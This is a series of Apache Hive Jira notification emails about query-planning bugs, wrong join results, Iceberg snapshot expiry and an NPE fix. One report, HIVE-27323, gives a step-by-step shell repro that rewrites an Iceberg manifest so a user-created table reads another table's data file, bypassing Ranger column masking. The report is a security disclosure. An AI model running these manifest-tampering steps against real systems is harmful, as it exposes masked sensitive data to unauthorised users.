> org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) 
> ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542)
>  ~[hive-exec-100.jar:?]
>   at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) 
> 

[jira] [Updated] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin

2023-11-30 Thread Stamatis Zampetakis (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Stamatis Zampetakis updated HIVE-27658:
---
Attachment: hive27658-query-plan.pdf

> Error resolving join keys during conversion to dynamic partition hashjoin
> -
>
> Key: HIVE-27658
> URL: https://issues.apache.org/jira/browse/HIVE-27658
> Project: Hive
>  Issue Type: Bug
>  Components: Query Planning
>Affects Versions: 3.1.3, 4.0.0-beta-1
>Reporter: xiaojunxiang
>Priority: Major
> Attachments: hive27658-query-plan.pdf, hive27658.q
>
>
> In certain cases the compilation of queries fail during the conversion to a 
> dynamic partition hash join with the stacktrace similar to the one shown 
> below.
> {noformat}
> 2023-08-31T10:22:21,738 WARN  [HiveServer2-Handler-Pool: Thread-100]: 
> thrift.ThriftCLIService (()) - Error executing statement: 
> org.apache.hive.service.cli.HiveSQLException: Error while compiling 
> statement: FAILED: SemanticException Error resolving join keys
>   at 
> org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) 
> ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562)
>  ~[hive-service-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542)
>  ~[hive-exec-100.jar:?]
>   at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) 
> ~[hive-exec-100.jar:?]
>   at org.apache.thrift.TBaseProcessor.process(TBaseProcessor.java:39) 
> ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.metastore.security.HadoopThriftAuthBridge$Server$TUGIAssumingProcessor.process(HadoopThriftAuthBridge.java:647)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.thrift.server.TThreadPoolServer$WorkerProcess.run(TThreadPoolServer.java:286)
>  ~[hive-exec-100.jar:?]
>   at 
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
>  ~[?:1.8.0_312]
>   at 
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
>  ~[?:1.8.0_312]
>   at java.lang.Thread.run(Thread.java:748) [?:1.8.0_312]
> Caused by: org.apache.hadoop.hive.ql.parse.SemanticException: Error resolving 
> join keys
>   at 
> org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.getMapJoinDesc(MapJoinProcessor.java:1105)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.convertJoinOpMapJoinOp(MapJoinProcessor.java:372)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinMapJoin(ConvertJoinMapJoin.java:1056)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinDynamicPartitionedHashJoin(ConvertJoinMapJoin.java:1280)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.fallbackToReduceSideJoin(ConvertJoinMapJoin.java:1312)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.checkAndConvertSMBJoin(ConvertJoinMapJoin.java:371)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.process(ConvertJoinMapJoin.java:151)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.DefaultRuleDispatcher.dispatch(DefaultRuleDispatcher.java:90)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatchAndReturn(DefaultGraphWalker.java:105)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatch(DefaultGraphWalker.java:89)
>  ~[hive-exec-100.jar:?]
>   at 
> org.apache.hadoop.hive.ql.lib.ForwardWalker.walk(ForwardWalker.java:74) 
> ~[hive-exec-100.jar:?]
>   at 
> 

[jira] [Assigned] (HIVE-26505) Case When Some result data is lost when there are common column conditions and partitioned column conditions

2023-11-30 Thread Krisztian Kasa (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-26505?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Krisztian Kasa reassigned HIVE-26505:
-

Assignee: Krisztian Kasa

> Case When Some result data is lost when there are common column conditions 
> and partitioned column conditions 
> -
>
> Key: HIVE-26505
> URL: https://issues.apache.org/jira/browse/HIVE-26505
> Project: Hive
>  Issue Type: Bug
>  Components: Hive
>Affects Versions: 3.1.0, 4.0.0-alpha-1
>Reporter: GuangMing Lu
>Assignee: Krisztian Kasa
>Priority: Critical
>  Labels: check, hive-4.0.0-must
>
> {code:java}https://issues.apache.org/jira/browse/HIVE-26505#
> create table test0831 (id string) partitioned by (cp string);
> insert into test0831 values ('a', '2022-08-23'),('c', '2022-08-23'),('d', 
> '2022-08-23');
> insert into test0831 values ('a', '2022-08-24'),('b', '2022-08-24');
> select * from test0831;
> +-+--+
> | test0831.id | test0831.cp  |
> +-+--+
> | a     | 2022-08-23   |
> | b        | 2022-08-23   |
> | a        | 2022-08-23   |
> | c        | 2022-08-24   |
> | d        | 2022-08-24   |
> +-+--+
> select * from test0831 where (case when id='a' and cp='2022-08-23' then 1 
> else 0 end)=0;  
> +--+--+
> | test0830.id  | test0830.cp  |
> +--+--+
> | a        | 2022-08-24   |
> | b        | 2022-08-24   |
> +--+--+
> {code}
>  



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97

2023-11-30 Thread Denys Kuzmenko (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791618#comment-17791618
 ] 

Denys Kuzmenko commented on HIVE-27269:
---

Merged to master.
[~seonggon], thank you for the patch!

> VectorizedMapJoin returns wrong result for TPC-DS query 97
> --
>
> Key: HIVE-27269
> URL: https://issues.apache.org/jira/browse/HIVE-27269
> Project: Hive
>  Issue Type: Sub-task
>Reporter: Seonggon Namgung
>Assignee: Seonggon Namgung
>Priority: Critical
>  Labels: hive-4.0.0-must, pull-request-available
>
> TPC-DS query 97 returns wrong results when hive.auto.convert.join and 
> hive.vectorized.execution.enabled are set to true.
>  
> Result of query 97 on 1TB text dataset:
> CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, 
> 284185{*}746{*}, 84163
> MapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163
> VectorMapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163
>  
> Also I observed that VectorizedMapJoin returns different results for 100GB 
> dataset when I run query 97 twice, but I could not reproduce it since then.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27269:
--
Fix Version/s: 4.0.0
   Resolution: Fixed
   Status: Resolved  (was: Patch Available)

> VectorizedMapJoin returns wrong result for TPC-DS query 97
> --
>
> Key: HIVE-27269
> URL: https://issues.apache.org/jira/browse/HIVE-27269
> Project: Hive
>  Issue Type: Sub-task
>Reporter: Seonggon Namgung
>Assignee: Seonggon Namgung
>Priority: Critical
>  Labels: hive-4.0.0-must, pull-request-available
> Fix For: 4.0.0
>
>
> TPC-DS query 97 returns wrong results when hive.auto.convert.join and 
> hive.vectorized.execution.enabled are set to true.
>  
> Result of query 97 on 1TB text dataset:
> CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, 
> 284185{*}746{*}, 84163
> MapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163
> VectorMapJoinOperator(hive.auto.convert.join=true, 
> hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163
>  
> Also I observed that VectorizedMapJoin returns different results for 100GB 
> dataset when I run query 97 twice, but I could not reproduce it since then.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27506) Migrate to ProtobufRpcEngine2

2023-11-30 Thread Ayush Saxena (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791603#comment-17791603
 ] 

Ayush Saxena commented on HIVE-27506:
-

[~kanaka] I don't think that is anywhere in the plan, I think to use 
ProtobufRpcEngine2 we need the thirdpaty-protobuf as well, so I don't think 
that is happening anytime soon

> Migrate to ProtobufRpcEngine2
> -
>
> Key: HIVE-27506
> URL: https://issues.apache.org/jira/browse/HIVE-27506
> Project: Hive
>  Issue Type: Task
>  Components: llap
>Reporter: Ashok Kumar
>Priority: Major
>
> Hadoop has moved over from protobu 2.5.0 to hadoop shaded protobuf. 
> It has created 
> [ProtobufRpcEngine2|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine2.java]
>  for this purpose.
> Hive llap still uses 
> [ProtobufRpcEngine|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine.java]
>  which is meant for protobuf 2.5.0 e.g 
> [Ref#|https://github.com/apache/hive/blob/bd02abc9eba3aa0cd3701b26d9169130551a12ef/llap-common/src/java/org/apache/hadoop/hive/llap/LlapUtil.java#L267]
> This Jira is  to update Hive llap codebase to use ProtobufRpcEngine2



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27323) Iceberg: malformed manifest file or list can cause data breach

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27323:
--
Labels: check pull-request-available  (was: check)

> Iceberg: malformed manifest file or list can cause data breach
> --
>
> Key: HIVE-27323
> URL: https://issues.apache.org/jira/browse/HIVE-27323
> Project: Hive
>  Issue Type: Bug
>  Components: Iceberg integration
>Affects Versions: 4.0.0-alpha-2
>Reporter: Janos Kovacs
>Priority: Blocker
>  Labels: check, pull-request-available
>
> Set to bug/blocker instead of enhancement due to its security related nature, 
> Hive4 should not be released w/o fix for this. Please reset if needed.
>  
> Fyi: it's similar to HIVE-27322 but this is more based on Iceberg's internals 
> and can't just be fixed via the storagehandler authorizer.
>  
> Context: 
>  * There are some core tables with sensitive data that users can only query 
> with data masking enforced (e.g. via Ranger). Let's assume this is the 
> `default.icebergsecured` table.
>  * An end-user can only access the masked form of the sensitive data as 
> expected...
>  * The users also have privilege to create new tables in their own sandbox 
> databases - let's assume this is the `default.trojanhorse` table for now.
>  * The user can create a malicious table that exposes the sensitive data 
> non-masked leading to a possible data breach.
>  * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user 
> direct file-system access needs
> Repro:
>  * First make sure the data is secured by the masking policy:
> {noformat}
> 
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) 
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see 
> this.','You are NOT allowed to see this!');
> "
> 
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +++
> | icebergsecured.txt | icebergsecured.secret  |
> +++
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +++
> {noformat}
>  * Now let the user to create the malicious table exposing the sensitive data:
> {noformat}
> 
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorseviadata;
> CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) 
> STORED BY ICEBERG
> LOCATION '/some-user-writeable-location/trojanhorseviadata';
> INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
> "
> SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>   beeline --outputformat=csv2 --showHeader=false --verbose=false 
> --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM 
> default.icebergsecured.files;" 2>/dev/null)
> TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal"
>  beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null 
> |grep metadata_location  |grep -v previous_metadata_location | awk '{print 
> $5}')
> TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep 
> "manifest-list"  |cut -f4 -d\")
> hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION
> TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION)
> TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq 
> '.manifest_path' |tr -d \")
> hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION
> TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION)
> mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig
> avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp 
> "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json
> avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > 
> ${TROJAN_MANIFESTFILE}.schema
> avro-tools fromjson --codec deflate --schema-file 
> ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > 
> ${TROJAN_MANIFESTFILE}.new
> hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION
> beeline -e "SELECT * FROM default.trojanhorseviadata;"
> ++---+
> |   trojanhorseviadata.txt   | trojanhorseviadata.secret |
> ++---+
> | You might be allowed to see this.  | You are not allowed to see this!  |
> ++---+
> {noformat}
>  
> There are actually multiple options to create such table and modify the 
> manifest/list like 

[jira] [Resolved] (HIVE-27633) HMS: MTable to Table process reduces view related SQL

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko resolved HIVE-27633.
---
Fix Version/s: 4.0.0
   Resolution: Fixed

> HMS: MTable to Table process reduces view related SQL
> -
>
> Key: HIVE-27633
> URL: https://issues.apache.org/jira/browse/HIVE-27633
> Project: Hive
>  Issue Type: Improvement
>  Components: Metastore
>Reporter: dzcxzl
>Assignee: dzcxzl
>Priority: Minor
>  Labels: pull-request-available
> Fix For: 4.0.0
>
>




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27633) HMS: MTable to Table process reduces view related SQL

2023-11-30 Thread Denys Kuzmenko (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791569#comment-17791569
 ] 

Denys Kuzmenko commented on HIVE-27633:
---

Merged to master.
thanks for the patch [~dzcxzl], and [~zhangbutao] for the review!

> HMS: MTable to Table process reduces view related SQL
> -
>
> Key: HIVE-27633
> URL: https://issues.apache.org/jira/browse/HIVE-27633
> Project: Hive
>  Issue Type: Improvement
>  Components: Metastore
>Reporter: dzcxzl
>Assignee: dzcxzl
>Priority: Minor
>  Labels: pull-request-available
>




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread Butao Zhang (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791561#comment-17791561
 ] 

Butao Zhang commented on HIVE-27712:


This problem is somewhat similar to that one 
https://issues.apache.org/jira/browse/HIVE-22633, which maybe be fixed by 
https://issues.apache.org/jira/browse/HIVE-23530

Could you please try this patch HIVE-23530?

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
>  Labels: pull-request-available
> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> using Hadoop 3.3.4
> Hive 3.1.3
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a sql with groupby execution and join execution, I got a 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Resolved] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties

2023-11-30 Thread Ayush Saxena (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ayush Saxena resolved HIVE-27903.
-
Fix Version/s: 4.0.0
   Resolution: Fixed

> Iceberg: Implement Expire Snapshot with default table properties
> 
>
> Key: HIVE-27903
> URL: https://issues.apache.org/jira/browse/HIVE-27903
> Project: Hive
>  Issue Type: Improvement
>  Components: Hive
>Affects Versions: 4.0.0-alpha-2
>Reporter: JK Pasimuthu
>Assignee: Ayush Saxena
>Priority: Major
>  Labels: pull-request-available
> Fix For: 4.0.0
>
>
> [https://github.com/apache/iceberg/issues/9123]
> The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while 
> expiring snapshots.
>  #  
> CREATE TABLE IF NOT EXISTS test5d78b6 (
> id INT, random1 STRING
> )
> PARTITIONED BY (random2 STRING)
> STORED BY ICEBERG
> TBLPROPERTIES (
> 'write.format.default'='orc',
> 'format-version'='2',
> 'write.orc.compression-codec'='none'
> )
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SLEEP for 30 seconds
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 
> 13:23:54.455')) * 1000;
>  # ALTER TABLE test5d78b6 SET 
> tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed 
> time in ms from the second insert and current time
>  # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10');
>  # SELECT COUNT FROM default.test5d78b6.snapshots;
> output: 1. it should be 2 rows. The default 1 is retained an all snapshots 
> are expired as usual, so setting the property has no effect.
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' 
> is 5 days per this link: 
> [https://iceberg.apache.org/docs/1.3.1/configuration/]
> Now while writing the tests and running them, the expiring snapshots just 
> worked fine within few seconds of the snapshots being created.
> So, I'm assuming that this option doesn't have any effect right now. Having 
> said that, I'm thinking the implications on end user will have if we fix this.
> The end user may not know about this option at all and will have tough time 
> figuring out why the snapshots are not getting expired. One option could be 
> to set the default to 0ms.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties

2023-11-30 Thread Ayush Saxena (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ayush Saxena updated HIVE-27903:

Summary: Iceberg: Implement Expire Snapshot with default table properties  
(was: TBLPROPERTIES('history.expire.max-snapshot-age-ms') doesn't work)

> Iceberg: Implement Expire Snapshot with default table properties
> 
>
> Key: HIVE-27903
> URL: https://issues.apache.org/jira/browse/HIVE-27903
> Project: Hive
>  Issue Type: Improvement
>  Components: Hive
>Affects Versions: 4.0.0-alpha-2
>Reporter: JK Pasimuthu
>Assignee: Ayush Saxena
>Priority: Major
>  Labels: pull-request-available
>
> [https://github.com/apache/iceberg/issues/9123]
> The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while 
> expiring snapshots.
>  #  
> CREATE TABLE IF NOT EXISTS test5d78b6 (
> id INT, random1 STRING
> )
> PARTITIONED BY (random2 STRING)
> STORED BY ICEBERG
> TBLPROPERTIES (
> 'write.format.default'='orc',
> 'format-version'='2',
> 'write.orc.compression-codec'='none'
> )
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SLEEP for 30 seconds
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 
> 13:23:54.455')) * 1000;
>  # ALTER TABLE test5d78b6 SET 
> tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed 
> time in ms from the second insert and current time
>  # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10');
>  # SELECT COUNT FROM default.test5d78b6.snapshots;
> output: 1. it should be 2 rows. The default 1 is retained an all snapshots 
> are expired as usual, so setting the property has no effect.
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' 
> is 5 days per this link: 
> [https://iceberg.apache.org/docs/1.3.1/configuration/]
> Now while writing the tests and running them, the expiring snapshots just 
> worked fine within few seconds of the snapshots being created.
> So, I'm assuming that this option doesn't have any effect right now. Having 
> said that, I'm thinking the implications on end user will have if we fix this.
> The end user may not know about this option at all and will have tough time 
> figuring out why the snapshots are not getting expired. One option could be 
> to set the default to 0ms.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties

2023-11-30 Thread Ayush Saxena (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791550#comment-17791550
 ] 

Ayush Saxena commented on HIVE-27903:
-

Committed to master.

Thanx [~jkcldr] for the report & [~zhangbutao] for the review!!!

> Iceberg: Implement Expire Snapshot with default table properties
> 
>
> Key: HIVE-27903
> URL: https://issues.apache.org/jira/browse/HIVE-27903
> Project: Hive
>  Issue Type: Improvement
>  Components: Hive
>Affects Versions: 4.0.0-alpha-2
>Reporter: JK Pasimuthu
>Assignee: Ayush Saxena
>Priority: Major
>  Labels: pull-request-available
>
> [https://github.com/apache/iceberg/issues/9123]
> The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while 
> expiring snapshots.
>  #  
> CREATE TABLE IF NOT EXISTS test5d78b6 (
> id INT, random1 STRING
> )
> PARTITIONED BY (random2 STRING)
> STORED BY ICEBERG
> TBLPROPERTIES (
> 'write.format.default'='orc',
> 'format-version'='2',
> 'write.orc.compression-codec'='none'
> )
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SLEEP for 30 seconds
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 
> 13:23:54.455')) * 1000;
>  # ALTER TABLE test5d78b6 SET 
> tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed 
> time in ms from the second insert and current time
>  # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10');
>  # SELECT COUNT FROM default.test5d78b6.snapshots;
> output: 1. it should be 2 rows. The default 1 is retained an all snapshots 
> are expired as usual, so setting the property has no effect.
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' 
> is 5 days per this link: 
> [https://iceberg.apache.org/docs/1.3.1/configuration/]
> Now while writing the tests and running them, the expiring snapshots just 
> worked fine within few seconds of the snapshots being created.
> So, I'm assuming that this option doesn't have any effect right now. Having 
> said that, I'm thinking the implications on end user will have if we fix this.
> The end user may not know about this option at all and will have tough time 
> figuring out why the snapshots are not getting expired. One option could be 
> to set the default to 0ms.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread liang yu (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791523#comment-17791523
 ] 

liang yu commented on HIVE-27712:
-

Solution:



add an check to verify if variable _'minFieldOI'_  and _'maxFieldOI'_ is null, 
if null,call _getValueObjectInspector with no arguments._

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
>  Labels: pull-request-available
> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> using Hadoop 3.3.4
> Hive 3.1.3
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a sql with groupby execution and join execution, I got a 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27712:
--
Labels: pull-request-available  (was: )

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
>  Labels: pull-request-available
